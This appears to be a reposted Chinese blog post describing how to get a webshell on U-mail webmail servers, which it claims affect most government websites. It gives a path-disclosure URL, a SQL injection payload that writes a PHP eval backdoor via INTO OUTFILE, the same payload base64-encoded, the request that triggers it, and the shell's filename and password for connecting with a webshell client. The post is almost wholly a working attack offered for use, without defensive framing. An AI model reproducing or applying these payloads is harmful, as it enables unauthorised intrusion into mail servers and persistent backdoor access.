大部分政府网站U-mail存在直接拿shell漏洞

Posted HACK--荒原狼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了大部分政府网站U-mail存在直接拿shell漏洞相关的知识,希望对你有一定的参考价值。

大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址

技术分享

然后将 aa‘ union select 1,2,3,4,5,6,‘<?php eval($_POST1);?>‘,8,9,10,11,12,13,14 into outfile ‘D:/umail/WorldClient/html/saknc.php‘#用base64编译一下YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==然后 http://127.0.0.1/webmail/fileshare.php?file=加上上面编译的base64代码可直接写入shell saknc.php用菜刀连接 http://127.0.0.1/webmail/saknc.php 密码:shell 

以上是关于大部分政府网站U-mail存在直接拿shell漏洞的主要内容,如果未能解决你的问题,请参考以下文章

利用野草weedcmsuseragent盲注漏洞拿shell

易酷cms本地包含漏洞拿shell

全是html页面怎么拿SHELL

sql通用防注入系统3.1最终纪念版怎么拿shell

一些拿shell的技巧

已知一个网站后台了,怎么拿weshell呢网站是php十MysQL